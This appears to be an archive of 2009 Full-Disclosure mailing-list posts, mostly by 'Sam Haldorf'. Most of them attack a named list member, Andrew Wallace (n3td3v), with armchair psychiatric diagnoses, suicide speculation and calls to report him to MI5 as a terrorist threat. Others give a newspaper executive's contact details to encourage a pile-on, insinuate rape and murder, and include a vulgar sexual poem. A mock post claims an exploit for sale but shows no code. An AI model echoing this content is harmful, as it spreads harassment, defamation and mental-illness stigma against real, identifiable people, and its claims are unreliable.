http://pastebin.com/f12f6f9c0
http://pastebin.mozilla.org/694145
http://pastebin.ca/1733192




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


__
Do You Yahoo!?
Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen 
Massenmails. 
http://mail.yahoo.com ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gadi Evron's professional profile exposed

[Sam Haldorf]

You can't beat MI6 behavioural / psychological profiling.

"...This is probably the last you'll see of the real n3td3v because there is 
sure to be a contract killer out to silence me...My last words to you is, don't 
let this matter rest, they have got rid of n3td3v, but there are bound to be 
people who will investigate what im saying, and I hope they do. Because my last 
request before I finish this rant is, don't forget the things ive been talking 
about and continue to investigate people while im gone." [Andrew Wallace as 
n3td3v, 1]

.. Silence. Ah. But according to his profile...

"...Intelligence agency intrigue & innuendo is a classic manifestation, along 
with imaginary friends, martyr glamorizations, alternate personalities and 
repeated exclamations that they will curtail their behaviors, only to come 
back, roaringly, foisting themselves upon a group/friend circle with a 
different guise or mission. Some have said it resembles alcoholic behavior in 
the promises 'to quit...'" [Anonymous profiler, 1]

.. Not even a month later:

"Please don't give to Gadi Evron and/or The Mossad that would be a crime 
against humanity and the west... " [Andrew 
Wallace as n3td3v as CyberArmageddon, 3][4]

Andrew Wallace (n3td3v / cyberarmageddon / 
whatever-fuckin-alias-you-decide-to-troll-on-that-week), consider a regimen of 
antipsychotics.

Professor Halderf, iPsyD, CISSP

[1] http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071660.html
[2] http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071542.html
[3] http://lists.grok.org.uk/pipermail/full-disclosure/2009-December/071991.html
[4] http://lists.grok.org.uk/pipermail/full-disclosure/2009-December/071994.html





Von: cyber armageddon 
An: Paul Schmehl ; full-disclosure@lists.grok.org.uk
Gesendet: Samstag, den 12. Dezember 2009, 17:24:27 Uhr
Betreff: Re: [Full-disclosure] Gadi Evron's professional profile exposed

On Sat, Dec 12, 2009 at 5:08 PM, Paul Schmehl  wrote:
> --On December 12, 2009 7:37:08 AM -0600 cyber armageddon
>  wrote:
>> IDF, Military Intelligence
>>
>> (Government Agency; 10,001 or more employees; Defense & Space industry)
>>
>> 2000 — 2003 (3 years )
>
>^
>
> That was six years ago.  Do the math doofus.
>

"Gadi Evron’s Specialties: I'm a campaign manager and an _agent_ of change."

http://il.linkedin.com/in/gadievron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


__
Do You Yahoo!?
Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen 
Massenmails. 
http://mail.yahoo.com ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The Cyber War Conspiracy

[Sam Haldorf]

Why do you speak of yourself in quotes? It makes you look batshit insane.

Andrew Wallace sounds like a terrorist. He's psychologically projecting.

n3td3v could be a legitimate cyber threat, in my opinion. He's a _creepy_ 
person.

--- n3td3v  schrieb am Fr, 4.12.2009:

Von: n3td3v 
Betreff: Re: [Full-disclosure] The Cyber War Conspiracy
An: "Sam Haldorf" , full-disclosure@lists.grok.org.uk
Datum: Freitag, 4. Dezember 2009, 23:28

You're a paranoid schizophrenic if you think "n3td3v" is all of those
people and / or a threat to anyone.

On Fri, Dec 4, 2009 at 10:32 PM, Sam Haldorf  wrote:
>
> What? Don't contact me you sick pervert.
>
> Someone please find out this subjects address and notify the government of 
> him. Jesus.
>
> Take it from Mr. Wallace, "If you suspect it, report it: 0800 789 321"
>
> n3td3v is probably ureleet, full-censorship, full-disclosure, antisec, jdl 
> and valdis.
>
> Please don't contact me. You're really scary.
>
> Take your medication and kindly leave.
>
> --- full-disclos...@safe-mail.net  schrieb am 
> Di, 1.12.2009:
>
> Von: full-disclos...@safe-mail.net 
> Betreff: Re: AW: [Full-disclosure] The Cyber War Conspiracy
> An: sahald...@ymail.com, full-disclosure@lists.grok.org.uk
> Datum: Dienstag, 1. Dezember 2009, 5:51
>
> I bet you to it mate but good troll attempt all the same ;)
>
> http://lists.grok.org.uk/pipermail/full-disclosure/2008-September/064425.html
>
> Hey Sam, amma let you finish, but n3td3v was the best troll of all time!
>
>  Original Message 
> From: Sam Haldorf 
> To: full-disclosure@lists.grok.org.uk
> Cc: full-disclos...@safe-mail.net
> Subject: AW: [Full-disclosure] The Cyber War Conspiracy
> Date: Mon, 30 Nov 2009 11:08:49 -0800 (PST)
>
>
> This is just doing too far.
>
> He's obviously a paranoid schizophrenic who uses aliases to bring attention 
> to himself. This means he's a loose cannon. A potential lone wolf terrorist. 
> Who knows, he may decide to do something nasty to bring attention to his 
> causes.
>
> It's obvious as Andrew Wallace's paranoia grows, his interest is going from 
> infosec (trolling FD) to real life. He may to adapt his attention-seeking MO 
> to real life, where he may harm real people. See what I mean?
>
> You know what you have to do.
>
> http://preview.tinyurl.com/report-n3td3v-to-MI5
>
> Paste his paranoid ramblings in there. This will help the government prevent 
> n3td3v from causing harm. They will keep a good eye on him.
>
> Warning: Do _not_ lie or in anyway misrepresent the truth when reporting him. 
> Just state the obvious if you do infact consider him a threat. Which I 
> obviously do.
>
> Thank you,
> Sam H
>
> --- full-disclos...@safe-mail.net  schrieb am 
> Mo, 30.11.2009:
>
> Von: full-disclos...@safe-mail.net 
> Betreff: [Full-disclosure] The Cyber War Conspiracy
> An: full-disclosure@lists.grok.org.uk
> Datum: Montag, 30. November 2009, 10:45
>
> It is my understanding the "security industry" would like nothing better than 
> a cyber war to kick off, mass profit, mass employment, mass political capital 
> to hit "cyber security" into the main stream of society to strike at the 
> heart of the single mom and retired couple crowd.
>
> Cyber War is a touchy subject if you ask any "security professional" they 
> don't like people saying straight out "cyber war is bullshit". They get 
> emotional about it, its as if they want it to happen. I see a build up 
> towards "Cyber War", the people in power such as Gadi Evron, he wants a Cyber 
> War its all he talks about. He was the first person to draw conclusions out 
> of fine air and were quick to blame the Russians for Estonia, even though 
> there was no evidence.
>
> Just like 9/11, you knew it was an inside job because they announced within 
> 24 hours they _knew_ it was Al-Qaeda even though they weren't able to stop 
> the attack if they knew so much about it.
>
> Estonia turned out to be a kid in his bedroom with some bot net command & 
> control, not the actual work of a super power.
>
> SANS want Cyber War, they asked the CIA to come to their SCADA conference in 
> 2008 to puke up a bunch of non-sense that Hackers had darkened cities, infact 
> the event never happened or took place it was shear propaganda, misleading 
> bullshit to build up the path for "Cyber War".
>
> "No cyberwar yet, but soon, says firm" a headline says on Securityfocus--- 
> This is a warning that something bad is about to happen. A cyber 9/11? The 
> security industry need cyber war, the hacker scene is falling flat

Re: [Full-disclosure] The Cyber War Conspiracy

[Sam Haldorf]

What? Don't contact me you sick pervert.

Someone please find out this subjects address and notify the government of him. 
Jesus. 

Take it from Mr. Wallace, "If you suspect it, report it: 0800 789 321"

n3td3v is probably ureleet, full-censorship, full-disclosure, antisec, jdl and 
valdis.

Please don't contact me. You're really scary.

Take your medication and kindly leave.

--- full-disclos...@safe-mail.net  schrieb am 
Di, 1.12.2009:

Von: full-disclos...@safe-mail.net 
Betreff: Re: AW: [Full-disclosure] The Cyber War Conspiracy
An: sahald...@ymail.com, full-disclosure@lists.grok.org.uk
Datum: Dienstag, 1. Dezember 2009, 5:51

I bet you to it mate but good troll attempt all the same ;) 



http://lists.grok.org.uk/pipermail/full-disclosure/2008-September/064425.html



Hey Sam, amma let you finish, but n3td3v was the best troll of all time!



 Original Message 

From: Sam Haldorf 

To: full-disclosure@lists.grok.org.uk

Cc: full-disclos...@safe-mail.net

Subject: AW: [Full-disclosure] The Cyber War Conspiracy

Date: Mon, 30 Nov 2009 11:08:49 -0800 (PST)

 




This is just doing too far.



He's obviously a paranoid schizophrenic who uses aliases to bring 
attention to himself. This means he's a loose cannon. A potential lone wolf 
terrorist. Who knows, he may decide to do something nasty to bring attention to 
his causes.



It's obvious as Andrew Wallace's paranoia grows, his interest is 
going from infosec (trolling FD) to real life. He may to adapt his 
attention-seeking MO to real life, where he may harm real people. See what I 
mean?



You know what you have to do.



http://preview.tinyurl.com/report-n3td3v-to-MI5



Paste his paranoid ramblings in there. This will help the 
government prevent n3td3v from causing harm. They will keep a good eye on him.



Warning: Do _not_ lie or in anyway misrepresent the truth when 
reporting him. Just state the obvious if you do infact consider him a  threat. 
Which I obviously do.

    

Thank you,

Sam H



--- full-disclos...@safe-mail.net  
schrieb am Mo, 30.11.2009:



Von: full-disclos...@safe-mail.net 

Betreff: [Full-disclosure] The Cyber War Conspiracy

An: full-disclosure@lists.grok.org.uk

Datum: Montag, 30. November 2009, 10:45




It is my understanding the "security industry" would like nothing 
better than a cyber war to kick off, mass profit, mass employment, mass 
political capital to hit "cyber security" into the main stream of society to 
strike at the heart of the single mom and retired couple crowd.



Cyber War is a touchy subject if you ask any "security 
professional" they don't like people saying straight out "cyber war is 
bullshit". They get  emotional about it, its as if they want it to happen. I 
see a build up towards "Cyber War", the people in power such as Gadi Evron, he 
wants a Cyber War its all he talks about. He was the first person to draw 
conclusions out of fine air and were quick to blame the Russians for Estonia, 
even though there was no evidence.



Just like 9/11, you knew it was an inside job because they 
announced within 24 hours they _knew_ it was Al-Qaeda even though they weren't 
able to stop the attack if they knew so much about it.



Estonia turned out to be a kid in his bedroom with some bot net 
command & control, not the actual work of a super power.



SANS want Cyber War, they asked the CIA to come to their SCADA 
conference in 2008 to puke up a bunch of non-sense that Hackers had darkened 
cities, infact the event never happened or took place it was shear propaganda, 
misleading bullshit to build up the path for "Cyber War".



"No cyberwar yet, but  soon, says firm" a headline says on 
Securityfocus--- This is a warning that something bad is about to happen. A 
cyber 9/11? The security industry need cyber war, the hacker scene is falling 
flat before our eyes there is no spectacular-event happened for a while, virus 
outbreaks and worms just don't happen like they used to to keep "cyber 
security" in high profile.



The pro-propaganda for "cyber security" is running out, the 
security industry is crying out for a cyber 9/11 scale event and thats what 
scares me.



One of the first things Obama took seriously when he went into the 
White House was Cyber Security, and remember the Marcus Sachs video even before 
the election, you could hear it in his 

Re: [Full-disclosure] "funsec" as a terror cell

[Sam Haldorf]

How do we tell who you are and who you aren't? You harass this list with so 
many aliases, even if someone did impersonate you, you're not reliable enough 
to trust.

Regardless, No one cares.

Andrew Wallace is the boy who cried wolf.

Sam H

--- full-disclos...@safe-mail.net  schrieb am 
So, 29.11.2009:

Von: full-disclos...@safe-mail.net 
Betreff: Re: [Full-disclosure] "funsec" as a terror cell
An: valdis.kletni...@vt.edu, full-disclosure@lists.grok.org.uk
Datum: Sonntag, 29. November 2009, 6:55

> we've been outed by an MI7 mole.

i honestly don't think you actually believe jdl at mac.hush.com was anything 
but an impersonation attempt.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


__
Do You Yahoo!?
Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen 
Massenmails. 
http://mail.yahoo.com ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The Cyber War Conspiracy

[Sam Haldorf]

This is just doing too far.

He's obviously a paranoid schizophrenic who uses aliases to bring attention to 
himself. This means he's a loose cannon. A potential lone wolf terrorist. Who 
knows, he may decide to do something nasty to bring attention to his causes.

It's obvious as Andrew Wallace's paranoia grows, his interest is going from 
infosec (trolling FD) to real life. He may to adapt his attention-seeking MO to 
real life, where he may harm real people. See what I mean?

You know what you have to do.

http://preview.tinyurl.com/report-n3td3v-to-MI5

Paste his paranoid ramblings in there. This will help the government prevent 
n3td3v from causing harm. They will keep a good eye on him.

Warning: Do _not_ lie or in anyway misrepresent the truth when reporting him. 
Just state the obvious if you do infact consider him a threat. Which I 
obviously do.

Thank you,
Sam H

--- full-disclos...@safe-mail.net  schrieb am 
Mo, 30.11.2009:

Von: full-disclos...@safe-mail.net 
Betreff: [Full-disclosure] The Cyber War Conspiracy
An: full-disclosure@lists.grok.org.uk
Datum: Montag, 30. November 2009, 10:45

It is my understanding the "security industry" would like nothing better than a 
cyber war to kick off, mass profit, mass employment, mass political capital to 
hit "cyber security" into the main stream of society to strike at the heart of 
the single mom and retired couple crowd.

Cyber War is a touchy subject if you ask any "security professional" they don't 
like people saying straight out "cyber war is bullshit". They get emotional 
about it, its as if they want it to happen. I see a build up towards "Cyber 
War", the people in power such as Gadi Evron, he wants a Cyber War its all he 
talks about. He was the first person to draw conclusions out of fine air and 
were quick to blame the Russians for Estonia, even though there was no evidence.

Just like 9/11, you knew it was an inside job because they announced within 24 
hours they _knew_ it was Al-Qaeda even though they weren't able to stop the 
attack if they knew so much about it.

Estonia turned out to be a kid in his bedroom with some bot net command & 
control, not the actual work of a super power.

SANS want Cyber War, they asked the CIA to come to their SCADA conference in 
2008 to puke up a bunch of non-sense that Hackers had darkened cities, infact 
the event never happened or took place it was shear propaganda, misleading 
bullshit to build up the path for "Cyber War".

"No cyberwar yet, but soon, says firm" a headline says on Securityfocus--- This 
is a warning that something bad is about to happen. A cyber 9/11? The security 
industry need cyber war, the hacker scene is falling flat before our eyes there 
is no spectacular-event happened for a while, virus outbreaks and worms just 
don't happen like they used to to keep "cyber security" in high profile.

The pro-propaganda for "cyber security" is running out, the security industry 
is crying out for a cyber 9/11 scale event and thats what scares me.

One of the first things Obama took seriously when he went into the White House 
was Cyber Security, and remember the Marcus Sachs video even before the 
election, you could hear it in his words, you could see it in his body 
language, folks in power in cyber security want to get cyber security into the 
main stream media. Marcus Sachs asked how can we put cyber security infront of 
the media? Cyber security isn't something that is talked about in the media, 
how can we put it infront of the media and the next administration, he said.

I trust Marcus Sachs like I trust a convicted paedophile. People like Joel 
Esler tried to defend him to me, how can you say such things about such a nice 
guy. But isn't everyone a nice guy on the surface? It's not until you really 
dig in and see the other side to a person and everyone has another side to them.

If people like Marcus Sachs are advising Obama right now on cyber security, be 
afraid very afraid. Remember this is the guy who has a picture of himself 
shaking the hand of George W. Bush on his home page, and smiling about it.

Because I said all this stuff previously I was attacked on this list, got 
banned by John Cartwright... there is a cover-up going on. My conclusions 
aren't sharp but they were on the right course, and they didn't want to risk 
the chance that I got something accurate, so they setup a bunch of aliases on 
here to provoke me into "troll style", to get people to think I was just an 
annoying twat and no value to this mailing list.

The same people tried to say I was some screwball etc, desperately trying to 
get folks not to take anything I say seriously.

They even tried to say I was anti-sec, yes "Ureleet" alias, remember him? He is 
to do with people who are involved with the people im accusing of building

Re: [Full-disclosure] Pussy and the right to free speech.

[Sam Haldorf]

http://www.kurtgreenbaum.com/
http://www.kurtgreenbaumisapussy.com/

Damn. This dudes getting some serious blowback.

Why didn't someone take DidKurtGreenbaumRapeAndMurderAYoungGirlIn1990.com?

--- yuri.n...@hushmail.com  schrieb am Fr, 20.11.2009:

Von: yuri.n...@hushmail.com 
Betreff: [Full-disclosure] Pussy and the right to free speech.
An: full-disclosure@lists.grok.org.uk
Datum: Freitag, 20. November 2009, 19:10

This whole thing is ridiculous.  Kurt Greenbaum is an idiot.  What 
kind of question is that in the first place?  Only and idiot would 
post “what’s the strangest thing you’ve ever eaten” and not expect 
some obvious remarks.  And what’s wrong with pussy?  Eating pussy 
is good!  I LOVE eating pussy!  All they guys I know, along with 
several women I know love to eat pussy.  I eat pussy.  You eat 
pussy.  Everyone eats pussy.  That’s because it’s fun.  And it’s 
good.  Even Dr. Seuss eats pussy as illustrated by one of his less 
distributed works:

Big pussy, small pussy,
girls at the mall pussy,
almost any kind of pussy will do.

Thin pussy, fat pussy,
Dog pussy, cat pussy,
Licking your screen pussy is just fine too.

Hot pussy, cold pussy,
Young pussy, old pussy,
Christian, Agnostic, a Muslim, or Jew.

I eat pussy standing up,
I eat pussy sitting down.
I eat pussy on the side of the bed with my knees on the ground.

I eat pussy that is nice,
I eat pussy that is mean.
I eat pussy till that fine pussy get wet up and steam.

Real pussy, toy pussy,
As long as it’s not boy pussy,
Or from that dike that they had on The View.

Rich pussy, poor pussy,
Virgin or whore pussy,
I eat it even when she swats on the loo.

Sweet pussy, sour pussy,
Pay by the hour pussy,
I always make sure that I show them my Fu.

I eat pussy in the sun,
I eat pussy in a haze.
I eat pussy till my face is covered in glaze.

I eat pussy in a tree,
I eat pussy in a pit,
I flickity flick flick my tongue on that clit. 

So, if Kurt don’t eat pussy, he must be a fag,
or only ate pussy that was on the rag.
And if you don’t want Greenbaum to make you the fool,
Don’t talk about pussy when you are at school.

Yuri Nate

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

__
Do You Yahoo!?
Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen 
Massenmails. 
http://mail.yahoo.com ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] n3td3v / Andrew Wallace's psychological profile

[Sam Haldorf]

Earlier this year, a very well educated FD member posted the psychological 
profile of Mr. Wallace. (Found here: 
http://seclists.org/fulldisclosure/2009/Jan/415 ) Interesting to view in 
retrospect, because I find it depicts him to a T.

This profile is almost like an instruction set for n3td3v's life. A 
self-fulfilling prophecy if you will.

An eery example: Anyone here remember how n3td3v posted as full-censorship a 
few months ago claiming to be a martyr? 
http://seclists.org/fulldisclosure/2009/Oct/45 . His profile states "Martyr 
glamorizations" aren't just n3td3v trolling you, he really considers himself as 
such. All the while you go out and bang your girlfriends and have fun with your 
friends, he's thinking the world revolves around him.

Another example is his frequent, obvious, though earnest attempts at using 
pseudonyms to defend himself. Often speaking of himself in third-person, as a 
hired lawyer, a hacker, zealous advocate, an underground "Full censorship" 
movement, etc.

It's possible as of late he may have done another attention-seeking false 
suicide. He hasn't updated his Google Page or Twitter in over 48 hours. I'm 
seriously worried. He may be wasting taxpayer money with fake suicide attempts. 
He's trolling society now.

I would like to post Andrew Wallace's psychological profile verbatim:

===
  Psychological profile of n3td3v / Andrew Wallace
===

Andrew is a special kind of crazya friend of mine and former colleague who 
I highly respect (practicing Psych., who profiles individuals for a real 
doggone intel agency...alas, not MI-Jive) labeled Andrew as a probable 
schizophrenic with grandiose idealizations.

These types of people usually can't hold a job.  The most active period of 
delusions occur from 17-33, some think the drop-off may be due to decreased 
levels of testosterone as they age.  Intelligence agency intrigue & innuendo is 
a classic manifestation, along with imaginary friends, martyr glamorizations, 
alternate personalities and repeated exclamations that they will curtail their 
behaviors, only to come back, roaringly, foisting themselves upon a 
group/friend circle with a different guise or mission. Some have said it 
resembles alcoholic behavior in the promises "to quit..."

They constantly need an audience, since 'friends' are temporal at best...they 
churn through relationships like shit flowing through a goose...as people 
become estranged/exasperated with the constant epiphany's, revelations and 
God-like interpretations.

Stranger yet is that people like this can be wonderfully charming in 
real-lifefunny for awhile, but as they age, they start losing boyish charms 
that previously were  
forgiven...promulgating even more outlandish behavior as grow older. Sound 
familiar?  We have a baseline here, folks.  Also notice he hasn't written 
anything technical -- it's mostly outlandish hypothesis with pointers to..not 
infosec...but Andrew.

They usually refuse medications to control themselves, because it dulls the 
essence of what they're trying to portray: someone mysterious, withholding 
critical information, being the sole-source of knowledge that might somehow 
change the world.

IMHO, I would venture to say Andrew has attempted suicide -- his type is 
usually unsuccessful, indeed, it's not a suicide attempt but an 
attention-seeking event.

He's bat-shit-fucking-crazy-nuts, but sane enough to fool someone unfamiliar 
with his MO.  That's what is so aggravating about this particular form of 
mental illness...once again, as long as there's a receptive audience, the 
monkey will feel the compulsion to perform.  It's akin to sexual gratification 
for him to see he's the subject of people's ire...don't forget that.

This type of person will emotionally soul-suck everyone he comes in contact 
with, and make up dramas if only to suck more
people in, because really, it's all about the adulation of n3td3v/Andrew/, 
nothing else.

Solutions:  There's a few, but I wouldn't want to be responsible for the end 
result; once again, n3td3v is a human たまごっち (Tamagotchi) and should be treated 
accordingly.

Source: http://seclists.org/fulldisclosure/2009/Jan/415  ( - o z - )


__
Do You Yahoo!?
Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen 
Massenmails. 
http://mail.yahoo.com ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Meet Kurt Greenbaum, Director of Social Media, St. Louis Post-Dispatch, Reports commenter to employer.

[Sam Haldorf]

Feel free to share your feelings with Greenbaum's boss:

Kevin Mowbray
Phone: 314-340-8970
E-mail: kmowb...@post-dispatch.com

--- mrx  schrieb am Fr, 20.11.2009:

Von: mrx 
Betreff: Re: [Full-disclosure] Meet Kurt Greenbaum, Director of Social Media, 
St. Louis Post-Dispatch, Reports commenter to employer.
An: full-disclosure@lists.grok.org.uk
Datum: Freitag, 20. November 2009, 0:16

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

No problem regarding the personal post, I have made the same mistake myself.

I also see what you mean regarding the language of the privacy statement.
"unauthorised use" could be interpreted as any use that has not been given 
explicit approval before the fact.

Weasel words imho.

And Mr Holstein if this was the point you were trying to make, I accept it.

regards
mrx



dramacrat wrote:
> Sorry, forgot to reply-to-all.

> 2009/11/20 dramacrat 
> 
>> They're ORs, unfortunately. The language is unclear but it seems to be one
>> of those infernal boilerplate pieces of shit that basically invalidate the
>> assurances as to privacy.
>>
>> You could still probably press the suit. "Unauthorised use" has recently
>> been defined and redefined, it's an evolving piece of law and if you have
>> the resources to get a jury trial they'll *want* to find in favor of the
>> plaintiff, which is more important than you might expect.
>>
>> 2009/11/20 mrx 
>>
>> -BEGIN PGP SIGNED MESSAGE-
>>> Hash: SHA1
>>>
>>> Michael Holstein wrote:
> What Greenbaum did was against the privacy policy of the site:
>
 You seem to be missing the part where the comment was removed (several
 times) and re-posted.

  From : http://www.stltoday.com/help/privacy-policy

 "..to protect against misuse or unauthorized use of our web sites"


 Cheers,

 Michael Holstein
 Cleveland State University
>>>
>>> So what? Ban the IP address. Admittedly a childish comment but the site is
>>> hardly one that is frequented by children.
>>> imho Mr K. Greenbaum should be fired and sued.
>>>
>>> And Mr Holstein you seem to be using your quote above out of context...
>>>
>>> Compliance with Legal Process
>>> We may disclose personal information if we or one of our affiliated
>>> companies is required by law to disclose personal information, or if we
>>> believe in good faith that such action is necessary to comply with a law
>>> or some legal process, to protect or defend our rights and property, to
>>> protect against misuse or unauthorized use of our web sites or to protect
>>> the personal safety or property of our users or the public.
>>>
>>> INAL, however I ask where is the legal process in this matter?
>>>
>>>
>>> regards
>>> mrx
>>>
>>> - --
>>> I am not an expert, I have much to learn, I make mistakes.
>>> My words are just opinions which may or may not reflect the truth.
>>> Be kind to others, yet trust no one.
>>>
>>> http://www.propergander.org.uk
>>> -BEGIN PGP SIGNATURE-
>>> Version: GnuPG v1.4.2 (MingW32)
>>> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>>>
>>> iQEVAwUBSwXFRrIvn8UFHWSmAQIwtwf/VNGjwG1wW7wd2BlUYf1XiQyG+DnjUGwQ
>>> GLrHcda/hGBw912diOjSGfVEe3jZSgfrK3SAH2lIrRfMK/I+n6IJxzKOks41Ojmo
>>> 14DsWiuc/58aAF1Y0heK94Wm1jfzIqMx9GjR7iKLKKAW94YULyCh90xRgwIToNeO
>>> WsxT0wP+f5XvZubCpXPVRGQV42XW1kg84t5dzPZXkjiii5dL6hSF7XBOLOrBejry
>>> EMw+Eh3RUy1Jm4pjlzOwOUhm0BlHdYwzf+GPNs7X+wCE975gZ6K5P8T+UdvJP7nT
>>> qL/jC7S8qNyVi2SBlURKLRaJm50GYv/dY9QDFLwWklcflymw67fMkw==
>>> =tE1f
>>> -END PGP SIGNATURE-
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
> 


- --
I am not an expert, I have much to learn, I make mistakes.
My words are just opinions which may or may not reflect the truth.
Be kind to others, yet trust no one.

http://www.propergander.org.uk
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBSwXfxbIvn8UFHWSmAQL9SQgAvu4cN5dby3AUGPtYyX0NnHvVUEdEeJ6Y
yvbKgi5/VOT9uqAnoRWRABLwJh3dcrCpzKA9gjSWpyalqU/YzEQvfB/iFI1QQmZg
9u6N/mZgGkAW1WYeM54AnawrYW8a+2sF1c1QWBhX0gYRGNctOs/Gi7ObvndDb57Q
k4CAp537TqXLzbUwzPkoqNBoaDhBCa4CEkONvFYJtVbUTwmry8gH55tWXI48Fz6/
vWaw9XY5SDUmxz1QYnfji0YKg3OR2YPfdxKxRATdFba4iZa8S3AiOgxZ/OXDNewh
aeILmusBEeCjG+2Wx//EB6lTf5xr9sr7CMHziG+PZ/EsW/GctyNw1A==
=WZoJ
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


__
Do You Yahoo!?
Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen 
Massenmails. 
http://mail.yahoo.com ___
Full-Disclosure - We believe in it.
Charter: http://lis

[Full-disclosure] Meet Kurt Greenbaum, Director of Social Media, St. Louis Post-Dispatch, Reports commenter to employer.

[Sam Haldorf]

I smell a lawsuit coming on for our friend Greenbaum.

"ReadWriteWeb has an article up today discussing an incident in which a school 
employee lost his job after leaving a comment on the website of the St. Louis 
Post-Dispatch newspaper. After the school employee responded to the newspaper's 
poll of 'the strangest thing you've ever eaten' with a feline-inspired 
vulgarity, Kurt Greenbaum, the site's director of social media, tracked down 
the commenter's identity through his IP address and reported him to school 
officials. When confronted, the school employee resigned from his job."

http://yro.slashdot.org/story/09/11/19/0526239/Vulgar-Comment-On-Newspaper-Site-Costs-Man-His-Job

The comment in question:

"I have eaten many different animals (or at least parts of them), including 
rattlesnake, crocodile, alligator, iguana, turtle, and many different molluscs, 
arthropods, echinoids, and whatnot from sea or river. I have also eaten 
squirrel, bear, dog, and cat. So, I can say I have eaten pussy, and you can 
interpret or misinterpret it any way you want. Oh, and woof-woof, too."

Chilling free speech? It must invade the privacy of the poster to call his 
place of work over a comment like this.

What Greenbaum did was against the privacy policy of the site:

    "We will not share individual user information with third parties unless 
the user has specifically approved the release of that information"

So should people who run newspaper blogs call up the place of work to report 
they said an innuendo about cats?

http://igreenbaum.com

I'll be the first to say it. Kurt Greenbaum is a miraculous hypocrite who's 
career has basically been ruined. 

He may as well be like Chris Hansen and expose pedophiles. 
http://www.youtube.com/watch?v=8CgUXWIOLLw

__
Do You Yahoo!?
Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen 
Massenmails. 
http://mail.yahoo.com ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] The cyber security intelligence community will never be the same

[Sam Haldorf]

n3td3v prepares to leave the internet after having completed work on 
n3td3v-0pen0wn.sh



n3td3v has had it with the games done by you jackasses in the community who 
think its fun to impersonate and spread lies.



The full disclosure community is filled with sellouts. Because of this we have 
founded antisec to destroy.



n3td3v intelligence is a shining star that will always be the best place for 
cyber informatoin security.





 see my commentary on cnet http://www.cnet.com/profile/n3td3v/






now n3td3v has been told go to a doctor to take medicine to keep his head.



i feel there r people following me when i talked outside like mi5 agents. and i 
want to join mi5



n3td3v will be leaving for the hospital shortly where he will chill off for a 
whle









n3td3v will be watching over you. we are all seeing. we are all knowing.



n3td3v has gone back to yahoo chat as he waits to hear back from MI5, MI6 and 
the British Government for a job as an analyst







n3td3v holds the ssh backdoor exploit as n3td3v-0pen0wn.sh. he made it with the 
Yahoo chatroom security hacker scene







n3td3v will work alongside vendors to bring justice to those who dare wreak 
havoc on our reputation in the criminal underground



n3td3v is tired of the imbecelic british system of intelligence. he is moving 
deeper underground.



n3td3v is now chaos. n3td3v is now crime. n3td3v was, is and will aways be 
antisec. fd will know the name of andrew wallace.



talk shit get rocked. blackhat 4 lyfe







my name is andrew wallace

and i am.

free.



0pen0wn-n3td3v.sh is copyright 2009 antisec/n3td3v. All rights reversed.

to buy our exploit contact xploita...@gmail.com and 
andrew.wall...@rocketmail.com

bids starting at 10k euros or pounds sterling. eu members only.



gfsdfge




  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Twitter Pro: Best Buy's @twelpforce is full of [security] fail

[Sam Johnston]

[I hope this light weekend reading is considered on-topic for
full-disclosure but feel free to moderate/delete/ignore it if not]

Twitter Pro: Best Buy's @twelpforce is full of [security] fail
http://samj.net/2009/08/twitter-pro-best-buys-twelpforce-is.html

As you know I've been paying very close attention to Twitter this week
and while trawling through their blog looking for [ab]use of various
terms they're trying to trademark I found this little chestnut:
BestBuy, Good Stuff. Basically, "BestBuy has created a program they
call Twelpforce. The idea is that employees from across the
organization can interact quickly and easily with customers who have
questions about products". Curious I took a look at @twelpforce and
was greeted with this:

[pic]

Just in case you can't see it from here (or click through to the full
size version), the first tweet is:

@SimonTheSnowman this is true, Best Buy will rule the world. via
@mikelinsalaco

Here we have 12 year old Simon of Being Freakin' Awesome, Inc. (who
